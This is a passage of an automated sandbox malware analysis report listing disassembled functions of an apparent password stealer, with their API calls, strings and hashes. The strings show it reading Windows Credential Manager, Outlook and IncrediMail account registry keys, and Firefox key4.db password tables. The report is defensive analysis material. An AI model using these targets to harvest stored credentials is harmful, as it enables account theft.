                                                                                                                                                                                                          • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                          • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F928 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                          • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                          • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004045D6 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                                                                                                          • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                          • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F177 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                          • String ID: Creds$ps:password
                                                                                                                                                                                                          • API String ID: 551151806-1872227768
                                                                                                                                                                                                          • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                          • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404217 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                                          • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                                          • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                                                                                                          • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                          • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004094A2 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                                                                                                                          • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                          • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004106AD Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                          • API String ID: 714388716-318151290
                                                                                                                                                                                                          • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                          • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C750 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1416211542-0
                                                                                                                                                                                                          • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                          • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040DEF0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                                                                                                          • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                          • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402C4F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                          • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                            • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                            • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                          • API String ID: 1831126014-3814494228
                                                                                                                                                                                                          • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                          • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040FA44 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                                            • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                                            • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                                                                                                          • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                          • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406625 Relevance: 16.7, APIs: 7, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • key4.db, xrefs: 00406632
                                                                                                                                                                                                          • C@, xrefs: 00406625
                                                                                                                                                                                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                                          • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                          • API String ID: 2950547843-1835927508
                                                                                                                                                                                                          • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                          • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402FCD Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403010
                                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040305D
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403075
                                                                                                                                                                                                          • memset.MSVCRT ref: 004030A6
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004030EE
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00403117
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                                          • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                                          • API String ID: 3672803090-3168940695
                                                                                                                                                                                                          • Opcode ID: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                                                                          • Instruction ID: 39077b7eb5a2e68ecd5ff501a3ad8ea0a91829c9588d8d8ee698511e4ba158b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE3130B580021CFBDB11EB91CC82EEEBB7CAF15305F0041B6BA08A1152E7799F949F95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408C8C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 3540791495-3849865405
                                                                                                                                                                                                          • Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                          • Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418FCA Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 319COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                          • API String ID: 2619041689-3408036318
                                                                                                                                                                                                          • Opcode ID: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                                                                          • Instruction ID: 01a3cfc3161f2179d827f175e8c33b529befff994fa447307002f7c0b3a07cf5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
